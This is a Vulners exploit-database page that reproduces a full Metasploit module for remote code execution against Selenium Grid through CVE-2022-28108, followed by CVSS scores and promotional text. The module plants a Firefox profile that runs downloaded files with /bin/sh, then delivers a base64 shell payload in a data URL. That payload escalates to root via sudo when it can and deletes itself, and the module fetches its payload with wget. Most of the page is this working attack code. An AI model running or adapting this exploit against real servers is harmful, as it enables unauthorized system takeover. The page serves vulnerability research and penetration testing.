Vulners
Lucene search
Selenium Firefox Remote Code Execution Exploit
| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
 | Selenium Chrome Remote Code Execution Exploit | 8 Jan 202500:00 | – | zdt |
 | CVE-2022-28108 | 19 Apr 202203:15 | – | attackerkb |
 | Exploit for Cross-Site Request Forgery (CSRF) in Selenium Selenium_Grid | 9 Jan 202522:28 | – | githubexploit |
 | CVE-2022-28108 vulnerabilities | 10 Apr 202602:13 | – | cgr |
 | CVE-2022-28108 | 19 Apr 202207:23 | – | circl |
 | Selenium Server 跨站请求伪造漏洞 | 19 Apr 202200:00 | – | cnnvd |
 | Selenium Server Cross-Site Request Forgery Vulnerability | 21 Apr 202200:00 | – | cnvd |
 | Selenium Grid Cross-Site Request Forgery (CVE-2022-28108) | 7 Jun 202200:00 | – | checkpoint_advisories |
 | CVE-2022-28108 | 19 Apr 202202:55 | – | cve |
 | CVE-2022-28108 | 19 Apr 202202:55 | – | cvelist |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Selenium geckodriver RCE',
'Description' => %q{
Selenium Server (Grid) <= 4.27.0 (latest version at the time of this writing)
allows CSRF because it permits non-JSON content types
such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
},
'Author' => [
'Jon Stratton', # Exploit development
'Takahiro Yokoyama' # Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2022-28108'],
['URL', 'https://www.gabriel.urdhr.fr/2022/02/07/selenium-standalone-server-csrf-dns-rebinding-rce/'],
['URL', 'https://github.com/JonStratton/selenium-node-takeover-kit/tree/master'],
['EDB', '49915'],
],
'Payload' => {},
'Platform' => %w[linux],
'Targets' => [
[
'Linux Command', {
'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
'DefaultOptions' => {
'FETCH_COMMAND' => 'WGET'
}
}
],
],
'DefaultOptions' => {
'FETCH_DELETE' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => '2022-04-18',
'Notes' => {
'Stability' => [ CRASH_SAFE, ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION, ]
}
)
)
register_options(
[
Opt::RPORT(4444),
OptInt.new('TIMEOUT', [ true, 'Timeout for exploit (seconds)', 75 ])
]
)
end
def check
# Request for Selenium Grid version 4
v4res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'status')
})
if v4res && v4res.get_json_document && v4res.get_json_document.include?('value') &&
v4res.get_json_document['value'].include?('message')
if v4res.get_json_document['value']['message'] == 'Selenium Grid ready.'
return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected and ready.')
elsif v4res.get_json_document['value']['message'].downcase.include?('selenium grid')
return Exploit::CheckCode::Unknown('Selenium Grid version 4.x detected but not ready.')
end
end
# Request for Selenium Grid version 3
v3res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
return Exploit::CheckCode::Unknown('Unexpected server reply.') unless v3res&.code == 200
js_code = v3res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) }
return Exploit::CheckCode::Unknown('Unable to determine the version.') unless js_code
json_str = js_code.text.match(/var json = Object.freeze\('(.*?)'\);/)[1]
begin
json_data = JSON.parse(json_str)
rescue JSON::ParserError
return Exploit::CheckCode::Unknown('Unable to determine the version.')
end
return Exploit::CheckCode::Unknown('Unable to determine the version.') unless json_data && json_data.include?('version') && json_data['version']
# Extract the version
version = Rex::Version.new(json_data['version'])
@version3 = version < Rex::Version.new('4.0.0')
CheckCode::Appears("Version #{version} detected, which is vulnerable.")
end
def exploit
# Build profile zip file.
stringio = Zip::OutputStream.write_buffer do |io|
# Create a handler for shell scripts
io.put_next_entry('handlers.json')
io.write('{"defaultHandlersVersion":{"en-US":4},"mimeTypes":{"application/sh":{"action":2,"handlers":[{"name":"sh","path":"/bin/sh"}]}}}')
end
stringio.rewind
encoded_profile = Base64.strict_encode64(stringio.sysread)
# Create session with our new profile
new_session = {
desiredCapabilities: {
browserName: 'firefox',
firefox_profile: encoded_profile
},
capabilities: {
firstMatch: [
{
browserName: 'firefox',
"moz:firefoxOptions": { profile: encoded_profile }
}
]
}
}.to_json
# Start session with encoded_profile and save session id for cleanup.
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wd/hub/session'),
'headers' => { 'Content-Type' => 'application/json; charset=utf-8' },
'data' => new_session
}, datastore['TIMEOUT'])
fail_with(Failure::Unknown, 'Unexpected server reply.') unless res
session_id = res.get_json_document['value']['sessionId'] || res.get_json_document['sessionId']
fail_with(Failure::Unknown, 'Failed to start session.') unless session_id
print_status("Started session (#{session_id}).")
b64encoded_payload = Rex::Text.encode_base64(
"rm -rf $0\n"\
"if sudo -n true 2>/dev/null; then\n"\
" echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d | sudo su root -c /bin/bash\n"\
"else\n"\
" #{payload.encoded}\n"\
"fi\n"
)
data_url = "data:application/sh;charset=utf-16le;base64,#{b64encoded_payload}"
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "wd/hub/session/#{session_id}/url"),
'headers' => { 'Content-Type' => 'application/json; charset=utf-8' },
'data' => JSON.generate(url: data_url)
})
# The server does not send a response, so no check here
# This may take some time (about 5 minutes or so), so no timeout is set here.
res = send_request_cgi({
'method' => 'DELETE',
'uri' => normalize_uri(target_uri.path, @version3 ? "wd/hub/session/#{session_id}" : "session/#{session_id}"),
'headers' => { 'Content-Type' => 'application/json; charset=utf-8' }
})
if res
print_status("Deleted session (#{session_id}).")
else
print_status("Failed to delete the session (#{session_id}). "\
'You may need to wait for the session to expire (default: 5 minutes) or '\
'manually delete the session for the next exploit to succeed.')
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jan 2025 00:00Current
9.1High risk
Vulners AI Score9.1
CVSS 29.3
CVSS 3.18.8
EPSS0.22369